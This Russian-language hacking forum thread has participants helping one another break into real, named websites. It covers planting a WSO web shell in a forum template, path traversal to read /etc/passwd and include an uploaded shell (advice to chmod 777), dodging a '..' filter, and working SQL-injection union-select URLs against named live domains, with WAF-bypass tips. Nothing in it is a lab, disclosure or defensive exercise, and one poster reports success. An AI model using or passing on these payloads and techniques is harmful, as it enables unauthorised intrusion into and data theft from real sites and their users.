Ваши вопросы по уязвимостям.

Мммм, собственно а в чем разница?

 

Всем привет.. иногда сталкиваюсь с такой проблемой.
Инклюдю шелл (wso) или например код самого шелла вставляю в станицу шаблона форума... открываю нужную страницу, воожу пасс, попадаю в шелл.. который выглядит вот так
http://i014.radikal.ru/1105/81/b06fd20ea05a.jpg
Потом пытаюсь чтонить сделать сменить папку, открыть консоль и т.п. и меня опять выкидывает в начало... где вводить пасс
Что посоветуете?

add:
шелл залил в /tmp ...на форуме, где указываешь путь к аватару написано что папка не доступна для редактирования... ну или в этом роде... указал путь на 2 выше (/usr/local/www/site.com/www/) показала что все норм... попробовал туда залить шелл, но он там не появляется

 

юзай для таких дел шелл от маднета...

 

а эт какой? на форуме есть?

 

http://madnet.name/files/1/10.html

 

target.com/ - я залил на сервер, в домашнюю папку пользователя. К виртуальному хосту target.com он не относится никаким боком, кроме того что сидит там же.

ip-addr/~username/shell.php, спасибо, выглядит подходяще, попробую, но в конфиге апача UserDir disabled

 

А у пользователя, к которому ты залил шелл, вебдира есть? Сайт висит на пользователе? Если да, то ,собственно, читаешь файлы, узнаешь сайт, заходишь на шелл.

 

Неа, не получилось через юзердир.
Пользователь - просто юзер, непонятно кем и зачем там созданный, у него есть хомдир, но вебдиректории нет. Даже в хомпапке у него ничего кроме .bashrc итп(станд. консольных конфигов нет). В апаче, как я уже говорил, запрещены UserDir. Сайт лежит в другой папке (/var/www/blah-blah/blah/web/target/). Корневая пользователя в /home/username/(именно сюда имею доступ по ftp). Так я хотел проинклудить так: www.target.com/?a=dd&b=../../../../../../../home/username/shell.php но не получается, тогда как www.target.com/?a=dd&b=../../../../../../../etc/passwd исправно дает мне файлик. я так понял что проблема в том что апач(из под которого конечно крутится www.target.com/index.php) не имеет достаточно прав чтоб почитать /home/username/shell.php

 

Понял. Тогда дай /home/username и шеллу права 777 и снова проинклюдь

 

Подскажите как перейти в директорию выше если проверяет наличие .. ?

/news/index.php

PHP:

<?php
    function show_all_news(){

        $news_handle=opendir('news');
        while (false !== ($news_file = readdir($news_handle))) {
            if($news_file=='.'||$news_file=='..') continue;
            if (strstr(strtolower($news_file),".txt")&&!strstr($news_file,"~")){
                $news_out[]=$news_file;
            }
        }
        closedir($news_handle);

        rsort($news_out);
        foreach ($news_out as $news_file) {
            get_news("news/".$news_file);
        }
    }
    
    function get_news($ref){
        //echo $ref."<h3>05/04/10</h3>";

        $str=file($ref);
        echo '<p>'.$str[0].'</p>';
        $ref=preg_replace("/news\//","",$ref);
        echo '<a href="?view='.$ref.'">'.$str[1].'</a>';
        for ($i=2;$i<count($str);$i++){
            echo $str[$i].'';

        }
    }

    function show_page($ref){
        if(strstr($ref,'..')){
            notify("Неверная ссылка");
            return;
        }

        $out_str='';
        $arr=file('./news/'.$ref);
        if(!$arr){
            notify('Нет такой страницы');
            return;
        }
        $out_str.='<p>'.$arr[0].'</p>';
        $out_str.='<a href="?view='.$ref.'">'.$arr[1].'</a>';

        for ($i=2;$i<count($arr);$i++){
            $out_str.=$arr[$i].'';
        }
        echo ($out_str);
        echo ('<a href="?">Вернуться</a>');
    }
    if(isset($_GET['view'])){

        show_page($_GET['view']);
    }else{
        show_all_news();
    }
?>


 

ОМГ. прокатило) спасибо!(там еще проблема в том что в шелле ссылки релатив, но это уже дело техники, разберусь). Реально помог.

 

Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.

Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.

В чем может быть проблема?
Как её можно решить?

 

onsalecell.com где здесь скуля?

 

Скорее всего WAF стоит. Пробуй различные обходы WAF

 

Не могу таблицы посчитать,

http://www.iorta.com/catalog.php?catid=47+and+1=0+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),2+--+

5.0.1-alpha-log:trade:tradeuser@localhostc-linux

тут, все выводит, а дальше не получается


http://www.iorta.com/catalog.php?catid=-47+union+select+1,count(*)+from+information_schema.tables+--+


Что можете посоветовать?

 

FlaktW

не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было

 

Наверное, ты прав!

 

пруф

 

Возможно ли, если показывает пустую страницу (как тут: http://www.goldenformula.net/news.php?id=%27) что там есть скуль?!

 

Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?

Code:

http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+